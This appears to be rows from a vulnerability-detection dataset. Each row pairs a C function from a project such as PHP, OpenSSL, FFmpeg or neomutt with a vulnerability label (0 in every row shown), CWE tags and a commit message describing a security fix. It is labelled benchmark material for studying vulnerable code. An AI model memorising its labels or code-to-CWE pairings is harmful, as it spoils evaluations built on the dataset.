func
stringlengths
0
484k
target
int64
0
1
cwe
listlengths
0
4
project
stringclasses
799 values
commit_id
stringlengths
40
40
hash
float64
1,215,700,430,453,689,100,000,000B
340,281,914,521,452,260,000,000,000,000B
size
int64
1
24k
message
stringlengths
0
13.3k
static int ZEND_FASTCALL ZEND_FETCH_OBJ_RW_SPEC_CV_VAR_HANDLER(ZEND_OPCODE_HANDLER_ARGS) { zend_op *opline = EX(opline); zend_free_op free_op1, free_op2; zval *property = _get_zval_ptr_var(&opline->op2, EX(Ts), &free_op2 TSRMLS_CC); zval **container = _get_zval_ptr_ptr_cv(&opline->op1, EX(Ts), BP_VAR_RW TSRMLS_CC); if (0) { MAKE_REAL_ZVAL_PTR(property); } if (IS_CV == IS_VAR && !container) { zend_error_noreturn(E_ERROR, "Cannot use string offset as an object"); } zend_fetch_property_address(&EX_T(opline->result.u.var), container, property, BP_VAR_RW TSRMLS_CC); if (0) { zval_ptr_dtor(&property); } else { if (free_op2.var) {zval_ptr_dtor(&free_op2.var);}; } if (IS_CV == IS_VAR && 0 && READY_TO_DESTROY(free_op1.var)) { AI_USE_PTR(EX_T(opline->result.u.var).var); if (!PZVAL_IS_REF(*EX_T(opline->result.u.var).var.ptr_ptr) && Z_REFCOUNT_PP(EX_T(opline->result.u.var).var.ptr_ptr) > 2) { SEPARATE_ZVAL(EX_T(opline->result.u.var).var.ptr_ptr); } } ZEND_VM_NEXT_OPCODE(); }
0
[]
php-src
ce96fd6b0761d98353761bf78d5bfb55291179fd
155,338,722,407,056,550,000,000,000,000,000,000,000
30
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
inline static void _set_priority(priority_st * st, const int *list) { int num = 0, i; while (list[num] != 0) num++; if (num > MAX_ALGOS) num = MAX_ALGOS; st->algorithms = num; for (i = 0; i < num; i++) { st->priority[i] = list[i]; } return; }
0
[ "CWE-310" ]
gnutls
21f89efad7014a5ee0debd4cd3d59e27774b29e6
104,832,585,941,476,090,000,000,000,000,000,000,000
16
handshake: add FALLBACK_SCSV priority option This allows clients to enable the TLS_FALLBACK_SCSV mechanism during the handshake, as defined in RFC7507.
int ff_side_data_update_matrix_encoding(AVFrame *frame, enum AVMatrixEncoding matrix_encoding) { AVFrameSideData *side_data; enum AVMatrixEncoding *data; side_data = av_frame_get_side_data(frame, AV_FRAME_DATA_MATRIXENCODING); if (!side_data) side_data = av_frame_new_side_data(frame, AV_FRAME_DATA_MATRIXENCODING, sizeof(enum AVMatrixEncoding)); if (!side_data) return AVERROR(ENOMEM); data = (enum AVMatrixEncoding*)side_data->data; *data = matrix_encoding; return 0; }
0
[ "CWE-703" ]
FFmpeg
e5c7229999182ad1cef13b9eca050dba7a5a08da
97,814,553,009,169,970,000,000,000,000,000,000,000
19
avcodec/utils: set AVFrame format unconditional Fixes inconsistency and out of array accesses Fixes: 10cdd7e63e7f66e3e66273939e0863dd-asan_heap-oob_1a4ff32_7078_cov_4056274555_mov_h264_aac__mp4box_frag.mp4 Found-by: Mateusz "j00ru" Jurczyk and Gynvael Coldwind Signed-off-by: Michael Niedermayer <[email protected]>
int imap_fast_trash(struct Context *ctx, char *dest) { char mbox[LONG_STRING]; char mmbox[LONG_STRING]; char prompt[LONG_STRING]; int rc; struct ImapMbox mx; bool triedcreate = false; struct Buffer *sync_cmd = NULL; int err_continue = MUTT_NO; struct ImapData *idata = ctx->data; if (imap_parse_path(dest, &mx)) { mutt_debug(1, "bad destination %s\n", dest); return -1; } /* check that the save-to folder is in the same account */ if (mutt_account_match(&(idata->conn->account), &(mx.account)) == 0) { mutt_debug(3, "%s not same server as %s\n", dest, ctx->path); return 1; } imap_fix_path(idata, mx.mbox, mbox, sizeof(mbox)); if (!*mbox) mutt_str_strfcpy(mbox, "INBOX", sizeof(mbox)); imap_munge_mbox_name(idata, mmbox, sizeof(mmbox), mbox); sync_cmd = mutt_buffer_new(); for (int i = 0; i < ctx->msgcount; i++) { if (ctx->hdrs[i]->active && ctx->hdrs[i]->changed && ctx->hdrs[i]->deleted && !ctx->hdrs[i]->purge) { rc = imap_sync_message_for_copy(idata, ctx->hdrs[i], sync_cmd, &err_continue); if (rc < 0) { mutt_debug(1, "could not sync\n"); goto out; } } } /* loop in case of TRYCREATE */ do { rc = imap_exec_msgset(idata, "UID COPY", mmbox, MUTT_TRASH, 0, 0); if (!rc) { mutt_debug(1, "No messages to trash\n"); rc = -1; goto out; } else if (rc < 0) { mutt_debug(1, "could not queue copy\n"); goto out; } else { mutt_message(ngettext("Copying %d message to %s...", "Copying %d messages to %s...", rc), rc, mbox); } /* let's get it on */ rc = imap_exec(idata, NULL, IMAP_CMD_FAIL_OK); if (rc == -2) { if (triedcreate) { mutt_debug(1, "Already tried to create mailbox %s\n", mbox); break; } /* bail out if command failed for reasons other than nonexistent target */ if (mutt_str_strncasecmp(imap_get_qualifier(idata->buf), "[TRYCREATE]", 11) != 0) break; mutt_debug(3, "server suggests TRYCREATE\n"); snprintf(prompt, sizeof(prompt), _("Create %s?"), mbox); if (Confirmcreate && mutt_yesorno(prompt, 1) != MUTT_YES) { mutt_clear_error(); goto out; } if (imap_create_mailbox(idata, mbox) < 0) break; triedcreate = true; } } while (rc == -2); if (rc != 0) { imap_error("imap_fast_trash", idata->buf); goto out; } rc = 0; out: mutt_buffer_free(&sync_cmd); FREE(&mx.mbox); return (rc < 0) ? -1 : rc; }
0
[ "CWE-78", "CWE-77" ]
neomutt
95e80bf9ff10f68cb6443f760b85df4117cb15eb
208,102,472,246,240,420,000,000,000,000,000,000,000
106
Quote path in imap_subscribe
ExecRuntime *unit_get_exec_runtime(Unit *u) { size_t offset; if (u->type < 0) return NULL; offset = UNIT_VTABLE(u)->exec_runtime_offset; if (offset <= 0) return NULL; return *(ExecRuntime**) ((uint8_t*) u + offset); }
0
[ "CWE-269" ]
systemd
bf65b7e0c9fc215897b676ab9a7c9d1c688143ba
35,527,336,205,894,680,000,000,000,000,000,000,000
12
core: imply NNP and SUID/SGID restriction for DynamicUser=yes service Let's be safe, rather than sorry. This way DynamicUser=yes services can neither take benefit of, nor create SUID/SGID binaries. Given that DynamicUser= is a recent addition only we should be able to get away with turning this on, even though this is strictly speaking a binary compatibility breakage.
AlterObjectNamespace_oid(Oid classId, Oid objid, Oid nspOid, ObjectAddresses *objsMoved) { Oid oldNspOid = InvalidOid; ObjectAddress dep; dep.classId = classId; dep.objectId = objid; dep.objectSubId = 0; switch (getObjectClass(&dep)) { case OCLASS_CLASS: { Relation rel; rel = relation_open(objid, AccessExclusiveLock); oldNspOid = RelationGetNamespace(rel); AlterTableNamespaceInternal(rel, oldNspOid, nspOid, objsMoved); relation_close(rel, NoLock); break; } case OCLASS_TYPE: oldNspOid = AlterTypeNamespace_oid(objid, nspOid, objsMoved); break; case OCLASS_PROC: case OCLASS_COLLATION: case OCLASS_CONVERSION: case OCLASS_OPERATOR: case OCLASS_OPCLASS: case OCLASS_OPFAMILY: case OCLASS_STATISTIC_EXT: case OCLASS_TSPARSER: case OCLASS_TSDICT: case OCLASS_TSTEMPLATE: case OCLASS_TSCONFIG: { Relation catalog; catalog = table_open(classId, RowExclusiveLock); oldNspOid = AlterObjectNamespace_internal(catalog, objid, nspOid); table_close(catalog, RowExclusiveLock); } break; case OCLASS_CAST: case OCLASS_CONSTRAINT: case OCLASS_DEFAULT: case OCLASS_LANGUAGE: case OCLASS_LARGEOBJECT: case OCLASS_AM: case OCLASS_AMOP: case OCLASS_AMPROC: case OCLASS_REWRITE: case OCLASS_TRIGGER: case OCLASS_SCHEMA: case OCLASS_ROLE: case OCLASS_DATABASE: case OCLASS_TBLSPACE: case OCLASS_FDW: case OCLASS_FOREIGN_SERVER: case OCLASS_USER_MAPPING: case OCLASS_DEFACL: case OCLASS_EXTENSION: case OCLASS_EVENT_TRIGGER: case OCLASS_POLICY: case OCLASS_PUBLICATION: case OCLASS_PUBLICATION_REL: case OCLASS_SUBSCRIPTION: case OCLASS_TRANSFORM: /* ignore object types that don't have schema-qualified names */ break; /* * There's intentionally no default: case here; we want the * compiler to warn if a new OCLASS hasn't been handled above. */ } return oldNspOid; }
0
[ "CWE-862" ]
postgres
b048f558dd7c26a0c630a2cff29d3d8981eaf6b9
273,593,337,679,603,000,000,000,000,000,000,000,000
88
Fix priv checks for ALTER <object> DEPENDS ON EXTENSION Marking an object as dependant on an extension did not have any privilege check whatsoever; this allowed any user to mark objects as droppable by anyone able to DROP EXTENSION, which could be used to cause system-wide havoc. Disallow by checking that the calling user owns the mentioned object. (No constraints are placed on the extension.) Security: CVE-2020-1720 Reported-by: Tom Lane Discussion: [email protected]
t2p_sizeproc(thandle_t handle) { (void) handle; return -1; }
0
[ "CWE-787" ]
libtiff
7be2e452ddcf6d7abca88f41d3761e6edab72b22
281,615,789,486,612,850,000,000,000,000,000,000,000
5
tiff2pdf.c: properly calculate datasize when saving to JPEG YCbCr fixes #220
static void GTextFieldInit() { FontRequest rq; memset(&rq,0,sizeof(rq)); GGadgetInit(); GDrawDecomposeFont(_ggadget_default_font,&rq); rq.family_name = NULL; rq.utf8_family_name = MONO_UI_FAMILIES; _gtextfield_font = GDrawInstanciateFont(NULL,&rq); _GGadgetCopyDefaultBox(&_GGadget_gtextfield_box); _GGadget_gtextfield_box.padding = 3; /*_GGadget_gtextfield_box.flags = box_active_border_inner;*/ _gtextfield_font = _GGadgetInitDefaultBox("GTextField.",&_GGadget_gtextfield_box,_gtextfield_font); glistfield_box = _GGadget_gtextfield_box; _GGadgetInitDefaultBox("GComboBox.",&glistfield_box,_gtextfield_font); glistfieldmenu_box = glistfield_box; glistfieldmenu_box.padding = 1; _GGadgetInitDefaultBox("GComboBoxMenu.",&glistfieldmenu_box,_gtextfield_font); gnumericfield_box = _GGadget_gtextfield_box; _GGadgetInitDefaultBox("GNumericField.",&gnumericfield_box,_gtextfield_font); gnumericfieldspinner_box = gnumericfield_box; gnumericfieldspinner_box.border_type = bt_none; gnumericfieldspinner_box.border_width = 0; gnumericfieldspinner_box.padding = 0; _GGadgetInitDefaultBox("GNumericFieldSpinner.",&gnumericfieldspinner_box,_gtextfield_font); gtextfield_inited = true; }
0
[ "CWE-119", "CWE-787" ]
fontforge
626f751752875a0ddd74b9e217b6f4828713573c
7,935,713,096,855,530,000,000,000,000,000,000,000
27
Warn users before discarding their unsaved scripts (#3852) * Warn users before discarding their unsaved scripts This closes #3846.
static int file_close(jas_stream_obj_t *obj) { jas_stream_fileobj_t *fileobj = JAS_CAST(jas_stream_fileobj_t *, obj); int ret; ret = close(fileobj->fd); if (fileobj->flags & JAS_STREAM_FILEOBJ_DELONCLOSE) { unlink(fileobj->pathname); } jas_free(fileobj); return ret; }
0
[ "CWE-189" ]
jasper
3c55b399c36ef46befcb21e4ebc4799367f89684
248,434,265,937,089,800,000,000,000,000,000,000,000
11
At many places in the code, jas_malloc or jas_recalloc was being invoked with the size argument being computed in a manner that would not allow integer overflow to be detected. Now, these places in the code have been modified to use special-purpose memory allocation functions (e.g., jas_alloc2, jas_alloc3, jas_realloc2) that check for overflow. This should fix many security problems.
static int pop_stack(struct bpf_verifier_env *env, int *prev_insn_idx) { struct bpf_verifier_stack_elem *elem; int insn_idx; if (env->head == NULL) return -1; memcpy(&env->cur_state, &env->head->st, sizeof(env->cur_state)); insn_idx = env->head->insn_idx; if (prev_insn_idx) *prev_insn_idx = env->head->prev_insn_idx; elem = env->head->next; kfree(env->head); env->head = elem; env->stack_size--; return insn_idx; }
0
[ "CWE-200" ]
linux
0d0e57697f162da4aa218b5feafe614fb666db07
286,245,177,078,094,100,000,000,000,000,000,000,000
18
bpf: don't let ldimm64 leak map addresses on unprivileged The patch fixes two things at once: 1) It checks the env->allow_ptr_leaks and only prints the map address to the log if we have the privileges to do so, otherwise it just dumps 0 as we would when kptr_restrict is enabled on %pK. Given the latter is off by default and not every distro sets it, I don't want to rely on this, hence the 0 by default for unprivileged. 2) Printing of ldimm64 in the verifier log is currently broken in that we don't print the full immediate, but only the 32 bit part of the first insn part for ldimm64. Thus, fix this up as well; it's okay to access, since we verified all ldimm64 earlier already (including just constants) through replace_map_fd_with_map_ptr(). Fixes: 1be7f75d1668 ("bpf: enable non-root eBPF programs") Fixes: cbd357008604 ("bpf: verifier (add ability to receive verification log)") Reported-by: Jann Horn <[email protected]> Signed-off-by: Daniel Borkmann <[email protected]> Acked-by: Alexei Starovoitov <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static int TS_check_policy(ASN1_OBJECT *req_oid, TS_TST_INFO *tst_info) { ASN1_OBJECT *resp_oid = TS_TST_INFO_get_policy_id(tst_info); if (OBJ_cmp(req_oid, resp_oid) != 0) { TSerr(TS_F_TS_CHECK_POLICY, TS_R_POLICY_MISMATCH); return 0; } return 1; }
0
[]
openssl
c7235be6e36c4bef84594aa3b2f0561db84b63d8
217,919,661,057,956,200,000,000,000,000,000,000,000
12
RFC 3161 compliant time stamp request creation, response generation and response verification. Submitted by: Zoltan Glozik <[email protected]> Reviewed by: Ulf Moeller
cgiSetSize(const char *name, /* I - Name of variable */ int size) /* I - Number of elements (0 to N) */ { int i; /* Looping var */ _cgi_var_t *var; /* Returned variable */ if (name == NULL || size < 0 || size > 100000) return; if ((var = cgi_find_variable(name)) == NULL) return; if (size >= var->avalues) { const char **temp; /* Temporary pointer */ temp = (const char **)realloc((void *)(var->values), sizeof(char *) * (size_t)(size + 16)); if (!temp) return; var->avalues = size + 16; var->values = temp; } if (size > var->nvalues) { for (i = var->nvalues; i < size; i ++) var->values[i] = NULL; } else if (size < var->nvalues) { for (i = size; i < var->nvalues; i ++) if (var->values[i]) _cupsStrFree((void *)(var->values[i])); } var->nvalues = size; }
0
[]
cups
b9ff93ce913ff633a3f667317e5a81fa7fe0d5d3
338,563,325,748,653,940,000,000,000,000,000,000,000
40
CVE-2018-4700: Linux session cookies used a predictable random number seed.
struct kvm_memory_slot *kvm_vcpu_gfn_to_memslot(struct kvm_vcpu *vcpu, gfn_t gfn) { struct kvm_memslots *slots = kvm_vcpu_memslots(vcpu); u64 gen = slots->generation; struct kvm_memory_slot *slot; /* * This also protects against using a memslot from a different address space, * since different address spaces have different generation numbers. */ if (unlikely(gen != vcpu->last_used_slot_gen)) { vcpu->last_used_slot = NULL; vcpu->last_used_slot_gen = gen; } slot = try_get_memslot(vcpu->last_used_slot, gfn); if (slot) return slot; /* * Fall back to searching all memslots. We purposely use * search_memslots() instead of __gfn_to_memslot() to avoid * thrashing the VM-wide last_used_slot in kvm_memslots. */ slot = search_memslots(slots, gfn, false); if (slot) { vcpu->last_used_slot = slot; return slot; } return NULL;
0
[ "CWE-459" ]
linux
683412ccf61294d727ead4a73d97397396e69a6b
114,559,505,459,033,920,000,000,000,000,000,000,000
32
KVM: SEV: add cache flush to solve SEV cache incoherency issues Flush the CPU caches when memory is reclaimed from an SEV guest (where reclaim also includes it being unmapped from KVM's memslots). Due to lack of coherency for SEV encrypted memory, failure to flush results in silent data corruption if userspace is malicious/broken and doesn't ensure SEV guest memory is properly pinned and unpinned. Cache coherency is not enforced across the VM boundary in SEV (AMD APM vol.2 Section 15.34.7). Confidential cachelines, generated by confidential VM guests have to be explicitly flushed on the host side. If a memory page containing dirty confidential cachelines was released by VM and reallocated to another user, the cachelines may corrupt the new user at a later time. KVM takes a shortcut by assuming all confidential memory remain pinned until the end of VM lifetime. Therefore, KVM does not flush cache at mmu_notifier invalidation events. Because of this incorrect assumption and the lack of cache flushing, malicous userspace can crash the host kernel: creating a malicious VM and continuously allocates/releases unpinned confidential memory pages when the VM is running. Add cache flush operations to mmu_notifier operations to ensure that any physical memory leaving the guest VM get flushed. In particular, hook mmu_notifier_invalidate_range_start and mmu_notifier_release events and flush cache accordingly. The hook after releasing the mmu lock to avoid contention with other vCPUs. Cc: [email protected] Suggested-by: Sean Christpherson <[email protected]> Reported-by: Mingwei Zhang <[email protected]> Signed-off-by: Mingwei Zhang <[email protected]> Message-Id: <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
w3m_exit(int i) { #ifdef USE_MIGEMO init_migemo(); /* close pipe to migemo */ #endif stopDownload(); deleteFiles(); #ifdef USE_SSL free_ssl_ctx(); #endif disconnectFTP(); #ifdef USE_NNTP disconnectNews(); #endif #ifdef __MINGW32_VERSION WSACleanup(); #endif #ifdef HAVE_MKDTEMP if (no_rc_dir && tmp_dir != rc_dir) if (rmdir(tmp_dir) != 0) { fprintf(stderr, "Can't remove temporary directory (%s)!\n", tmp_dir); exit(1); } #endif exit(i); }
0
[ "CWE-59", "CWE-241" ]
w3m
18dcbadf2771cdb0c18509b14e4e73505b242753
247,135,278,041,220,600,000,000,000,000,000,000,000
26
Make temporary directory safely when ~/.w3m is unwritable
static ssize_t ucma_create_id(struct ucma_file *file, const char __user *inbuf, int in_len, int out_len) { struct rdma_ucm_create_id cmd; struct rdma_ucm_create_id_resp resp; struct ucma_context *ctx; enum ib_qp_type qp_type; int ret; if (out_len < sizeof(resp)) return -ENOSPC; if (copy_from_user(&cmd, inbuf, sizeof(cmd))) return -EFAULT; ret = ucma_get_qp_type(&cmd, &qp_type); if (ret) return ret; mutex_lock(&file->mut); ctx = ucma_alloc_ctx(file); mutex_unlock(&file->mut); if (!ctx) return -ENOMEM; ctx->uid = cmd.uid; ctx->cm_id = rdma_create_id(current->nsproxy->net_ns, ucma_event_handler, ctx, cmd.ps, qp_type); if (IS_ERR(ctx->cm_id)) { ret = PTR_ERR(ctx->cm_id); goto err1; } resp.id = ctx->id; if (copy_to_user((void __user *)(unsigned long)cmd.response, &resp, sizeof(resp))) { ret = -EFAULT; goto err2; } return 0; err2: rdma_destroy_id(ctx->cm_id); err1: mutex_lock(&mut); idr_remove(&ctx_idr, ctx->id); mutex_unlock(&mut); kfree(ctx); return ret; }
0
[ "CWE-284", "CWE-264" ]
linux
e6bd18f57aad1a2d1ef40e646d03ed0f2515c9e3
205,677,568,497,960,550,000,000,000,000,000,000,000
50
IB/security: Restrict use of the write() interface The drivers/infiniband stack uses write() as a replacement for bi-directional ioctl(). This is not safe. There are ways to trigger write calls that result in the return structure that is normally written to user space being shunted off to user specified kernel memory instead. For the immediate repair, detect and deny suspicious accesses to the write API. For long term, update the user space libraries and the kernel API to something that doesn't present the same security vulnerabilities (likely a structured ioctl() interface). The impacted uAPI interfaces are generally only available if hardware from drivers/infiniband is installed in the system. Reported-by: Jann Horn <[email protected]> Signed-off-by: Linus Torvalds <[email protected]> Signed-off-by: Jason Gunthorpe <[email protected]> [ Expanded check to all known write() entry points ] Cc: [email protected] Signed-off-by: Doug Ledford <[email protected]>
xdr_gpols_ret(XDR *xdrs, gpols_ret *objp) { if (!xdr_ui_4(xdrs, &objp->api_version)) { return (FALSE); } if (!xdr_kadm5_ret_t(xdrs, &objp->code)) { return (FALSE); } if (objp->code == KADM5_OK) { if (!xdr_int(xdrs, &objp->count)) { return (FALSE); } if (!xdr_array(xdrs, (caddr_t *) &objp->pols, (unsigned int *) &objp->count, ~0, sizeof(char *), xdr_nullstring)) { return (FALSE); } } return (TRUE); }
0
[ "CWE-703" ]
krb5
a197e92349a4aa2141b5dff12e9dd44c2a2166e3
297,112,340,943,592,950,000,000,000,000,000,000,000
21
Fix kadm5/gssrpc XDR double free [CVE-2014-9421] [MITKRB5-SA-2015-001] In auth_gssapi_unwrap_data(), do not free partial deserialization results upon failure to deserialize. This responsibility belongs to the callers, svctcp_getargs() and svcudp_getargs(); doing it in the unwrap function results in freeing the results twice. In xdr_krb5_tl_data() and xdr_krb5_principal(), null out the pointers we are freeing, as other XDR functions such as xdr_bytes() and xdr_string(). ticket: 8056 (new) target_version: 1.13.1 tags: pullup
cmsStage* ReadCLUT(struct _cms_typehandler_struct* self, cmsIOHANDLER* io, cmsUInt32Number Offset, int InputChannels, int OutputChannels) { cmsUInt8Number gridPoints8[cmsMAXCHANNELS]; // Number of grid points in each dimension. cmsUInt32Number GridPoints[cmsMAXCHANNELS], i; cmsUInt8Number Precision; cmsStage* CLUT; _cmsStageCLutData* Data; if (!io -> Seek(io, Offset)) return NULL; if (io -> Read(io, gridPoints8, cmsMAXCHANNELS, 1) != 1) return NULL; for (i=0; i < cmsMAXCHANNELS; i++) { if (gridPoints8[i] == 1) return NULL; // Impossible value, 0 for no CLUT and then 2 at least GridPoints[i] = gridPoints8[i]; } if (!_cmsReadUInt8Number(io, &Precision)) return NULL; if (!_cmsReadUInt8Number(io, NULL)) return NULL; if (!_cmsReadUInt8Number(io, NULL)) return NULL; if (!_cmsReadUInt8Number(io, NULL)) return NULL; CLUT = cmsStageAllocCLut16bitGranular(self ->ContextID, GridPoints, InputChannels, OutputChannels, NULL); if (CLUT == NULL) return NULL; Data = (_cmsStageCLutData*) CLUT ->Data; // Precision can be 1 or 2 bytes if (Precision == 1) { cmsUInt8Number v; for (i=0; i < Data ->nEntries; i++) { if (io ->Read(io, &v, sizeof(cmsUInt8Number), 1) != 1) return NULL; Data ->Tab.T[i] = FROM_8_TO_16(v); } } else if (Precision == 2) { if (!_cmsReadUInt16Array(io, Data->nEntries, Data ->Tab.T)) { cmsStageFree(CLUT); return NULL; } } else { cmsStageFree(CLUT); cmsSignalError(self ->ContextID, cmsERROR_UNKNOWN_EXTENSION, "Unknown precision of '%d'", Precision); return NULL; } return CLUT; }
0
[ "CWE-125" ]
Little-CMS
5ca71a7bc18b6897ab21d815d15e218e204581e2
272,827,695,283,645,800,000,000,000,000,000,000,000
57
Added an extra check to MLU bounds Thanks to Ibrahim el-sayed for spotting the bug
dtls1_process_heartbeat(SSL *s) { unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned short hbtype; unsigned int payload; unsigned int padding = 16; /* Use minimum padding */ if (s->msg_callback) s->msg_callback(0, s->version, TLS1_RT_HEARTBEAT, &s->s3->rrec.data[0], s->s3->rrec.length, s, s->msg_callback_arg); /* Read type and payload length first */ if (1 + 2 + 16 > s->s3->rrec.length) return 0; /* silently discard */ hbtype = *p++; n2s(p, payload); if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0; /* silently discard per RFC 6520 sec. 4 */ pl = p; if (hbtype == TLS1_HB_REQUEST) { unsigned char *buffer, *bp; unsigned int write_length = 1 /* heartbeat type */ + 2 /* heartbeat length */ + payload + padding; int r; if (write_length > SSL3_RT_MAX_PLAIN_LENGTH) return 0; /* Allocate memory for the response, size is 1 byte * message type, plus 2 bytes payload length, plus * payload, plus padding */ buffer = OPENSSL_malloc(write_length); bp = buffer; /* Enter response type, length and copy payload */ *bp++ = TLS1_HB_RESPONSE; s2n(payload, bp); memcpy(bp, pl, payload); bp += payload; /* Random padding */ RAND_pseudo_bytes(bp, padding); r = dtls1_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, write_length); if (r >= 0 && s->msg_callback) s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT, buffer, write_length, s, s->msg_callback_arg); OPENSSL_free(buffer); if (r < 0) return r; } else if (hbtype == TLS1_HB_RESPONSE) { unsigned int seq; /* We only send sequence numbers (2 bytes unsigned int), * and 16 random bytes, so we just try to read the * sequence number */ n2s(pl, seq); if (payload == 18 && seq == s->tlsext_hb_seq) { dtls1_stop_timer(s); s->tlsext_hb_seq++; s->tlsext_hb_pending = 0; } } return 0; }
0
[]
openssl
96db9023b881d7cd9f379b0c154650d6c108e9a3
76,451,328,488,845,400,000,000,000,000,000,000,000
78
Add heartbeat extension bounds check. A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <[email protected]> and Bodo Moeller <[email protected]> for preparing the fix (CVE-2014-0160)
xmlMemShow(FILE *fp, int nr ATTRIBUTE_UNUSED) { #ifdef MEM_LIST MEMHDR *p; #endif if (fp != NULL) fprintf(fp," MEMORY ALLOCATED : %lu, MAX was %lu\n", debugMemSize, debugMaxMemSize); #ifdef MEM_LIST xmlMutexLock(xmlMemMutex); if (nr > 0) { fprintf(fp,"NUMBER SIZE TYPE WHERE\n"); p = memlist; while ((p) && nr > 0) { fprintf(fp,"%6lu %6lu ",p->mh_number,(unsigned long)p->mh_size); switch (p->mh_type) { case STRDUP_TYPE:fprintf(fp,"strdup() in ");break; case MALLOC_TYPE:fprintf(fp,"malloc() in ");break; case MALLOC_ATOMIC_TYPE:fprintf(fp,"atomicmalloc() in ");break; case REALLOC_TYPE:fprintf(fp,"realloc() in ");break; case REALLOC_ATOMIC_TYPE:fprintf(fp,"atomicrealloc() in ");break; default:fprintf(fp," ??? in ");break; } if (p->mh_file != NULL) fprintf(fp,"%s(%u)", p->mh_file, p->mh_line); if (p->mh_tag != MEMTAG) fprintf(fp," INVALID"); xmlMemContentShow(fp, p); fprintf(fp,"\n"); nr--; p = p->mh_next; } } xmlMutexUnlock(xmlMemMutex); #endif /* MEM_LIST */ }
0
[ "CWE-787" ]
libxml2
897dffbae322b46b83f99a607d527058a72c51ed
45,254,445,319,648,600,000,000,000,000,000,000,000
37
Check for integer overflow in memory debug code Fixes bug 783026. Thanks to Pranjal Jumde for the report.
static PHP_FUNCTION(session_set_save_handler) { zval ***args = NULL; int i, num_args, argc = ZEND_NUM_ARGS(); char *name; if (PS(session_status) != php_session_none) { RETURN_FALSE; } if (argc != 1 && argc != 2 && argc != 6) { WRONG_PARAM_COUNT; } if (argc <= 2) { zval *obj = NULL, *callback = NULL; zend_uint func_name_len; char *func_name; HashPosition pos; zend_function *default_mptr, *current_mptr; ulong func_index; php_shutdown_function_entry shutdown_function_entry; zend_bool register_shutdown = 1; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "O|b", &obj, php_session_iface_entry, &register_shutdown) == FAILURE) { RETURN_FALSE; } /* Find implemented methods */ zend_hash_internal_pointer_reset_ex(&php_session_class_entry->function_table, &pos); i = 0; while (zend_hash_get_current_data_ex(&php_session_class_entry->function_table, (void **) &default_mptr, &pos) == SUCCESS) { zend_hash_get_current_key_ex(&php_session_class_entry->function_table, &func_name, &func_name_len, &func_index, 0, &pos); if (zend_hash_find(&Z_OBJCE_P(obj)->function_table, func_name, func_name_len, (void **)&current_mptr) == SUCCESS) { if (PS(mod_user_names).names[i] != NULL) { zval_ptr_dtor(&PS(mod_user_names).names[i]); } MAKE_STD_ZVAL(callback); array_init_size(callback, 2); Z_ADDREF_P(obj); add_next_index_zval(callback, obj); add_next_index_stringl(callback, func_name, func_name_len - 1, 1); PS(mod_user_names).names[i] = callback; } else { php_error_docref(NULL TSRMLS_CC, E_ERROR, "Session handler's function table is corrupt"); RETURN_FALSE; } zend_hash_move_forward_ex(&php_session_class_entry->function_table, &pos); ++i; } if (register_shutdown) { /* create shutdown function */ shutdown_function_entry.arg_count = 1; shutdown_function_entry.arguments = (zval **) safe_emalloc(sizeof(zval *), 1, 0); MAKE_STD_ZVAL(callback); ZVAL_STRING(callback, "session_register_shutdown", 1); shutdown_function_entry.arguments[0] = callback; /* add shutdown function, removing the old one if it exists */ if (!register_user_shutdown_function("session_shutdown", sizeof("session_shutdown"), &shutdown_function_entry TSRMLS_CC)) { zval_ptr_dtor(&callback); efree(shutdown_function_entry.arguments); php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unable to register session shutdown function"); RETURN_FALSE; } } else { /* remove shutdown function */ remove_user_shutdown_function("session_shutdown", sizeof("session_shutdown") TSRMLS_CC); } if (PS(mod) && PS(session_status) == php_session_none && PS(mod) != &ps_mod_user) { zend_alter_ini_entry("session.save_handler", sizeof("session.save_handler"), "user", sizeof("user")-1, PHP_INI_USER, PHP_INI_STAGE_RUNTIME); } RETURN_TRUE; } if (zend_parse_parameters(argc TSRMLS_CC, "+", &args, &num_args) == FAILURE) { return; } /* remove shutdown function */ remove_user_shutdown_function("session_shutdown", sizeof("session_shutdown") TSRMLS_CC); for (i = 0; i < 6; i++) { if (!zend_is_callable(*args[i], 0, &name TSRMLS_CC)) { efree(args); php_error_docref(NULL TSRMLS_CC, E_WARNING, "Argument %d is not a valid callback", i+1); efree(name); RETURN_FALSE; } efree(name); } if (PS(mod) && PS(mod) != &ps_mod_user) { zend_alter_ini_entry("session.save_handler", sizeof("session.save_handler"), "user", sizeof("user")-1, PHP_INI_USER, PHP_INI_STAGE_RUNTIME); } for (i = 0; i < 6; i++) { if (PS(mod_user_names).names[i] != NULL) { zval_ptr_dtor(&PS(mod_user_names).names[i]); } Z_ADDREF_PP(args[i]); PS(mod_user_names).names[i] = *args[i]; } efree(args); RETURN_TRUE; }
0
[]
php-src
df4bf28f9f104ca3ef78ed94b497859f15b004e5
30,985,409,824,692,597,000,000,000,000,000,000,000
114
Fix bug #70219 (Use after free vulnerability in session deserializer)
static bool valid_smtp_code(char *buf, size_t buflen, int *n) { char code[4]; if (buflen < 4) return false; code[0] = buf[0]; code[1] = buf[1]; code[2] = buf[2]; code[3] = '\0'; if (mutt_str_atoi(code, n) < 0) return false; return true; }
0
[ "CWE-94", "CWE-74" ]
neomutt
fb013ec666759cb8a9e294347c7b4c1f597639cc
207,112,861,546,169,800,000,000,000,000,000,000,000
14
tls: clear data after a starttls acknowledgement After a starttls acknowledgement message, clear the buffers of any incoming data / commands. This will ensure that all future data is handled securely. Co-authored-by: Pietro Cerutti <[email protected]>
